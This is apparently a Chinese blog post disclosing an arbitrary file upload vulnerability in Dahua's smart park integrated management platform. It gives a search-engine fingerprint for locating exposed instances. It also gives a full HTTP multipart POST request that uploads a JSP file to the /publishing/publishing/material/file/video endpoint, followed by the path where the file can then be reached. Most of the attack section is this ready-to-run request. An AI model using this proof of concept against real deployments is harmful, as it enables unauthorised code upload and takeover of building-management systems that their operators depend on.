Advertisement

大华智慧园区综合管理平台publishing任意文件上传漏洞

阅读量:

大华智慧园区综合管理平台存在文件上传漏洞,攻击者可通过POST /publishing/publishing/material/file/video接口任意上传文件,导致系统被攻击与控制。漏洞位于平台地址/publishing/publishing/material/file/video和/publishingImg/VIDEO/230812162057144051.jsp,可利用Java/1.8.0_381浏览器请求复现。

一、漏洞简介

大华智慧园区综合管理平台整合了智能化、信息化、网络化、安全化等多元功能,致力于为园区提供全方位的综合管理服务,涵盖安防、能源管理、环境监测、人员管理、停车管理等多个领域。该平台存在文件上传漏洞,攻击者可通过该平台的publishing/publishing/material/file/video接口任意上传文件,导致系统被攻击并被恶意控制。

二、影响版本

  • 大华智慧园区综合管理平台

三、资产测绘

  • hunterapp.name="Dahua 大华 智慧园区管理平台"
  • 登录页面
在这里插入图片描述

四、漏洞复现

复制代码
    POST /publishing/publishing/material/file/video HTTP/1.1
    Content-Type: multipart/form-data; boundary=00content0boundary00
    User-Agent: Java/1.8.0_381
    Host: xx.xx.xx.xx
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: close
    Content-Length: 287
    
    --00content0boundary00
    Content-Disposition: form-data; name="Filedata"; filename="1ndex.jsp"
    
    test
    --00content0boundary00
    Content-Disposition: form-data; name="file"
    
    file
    --00content0boundary00
    Content-Disposition: form-data; name="Submit"
    
    submit
    --00content0boundary00--
在这里插入图片描述

上传文件位置:

复制代码
    http://xx.xx.xx.xx/publishingImg/VIDEO/230812162057144051.jsp
在这里插入图片描述

全部评论 (0)

还没有任何评论哟~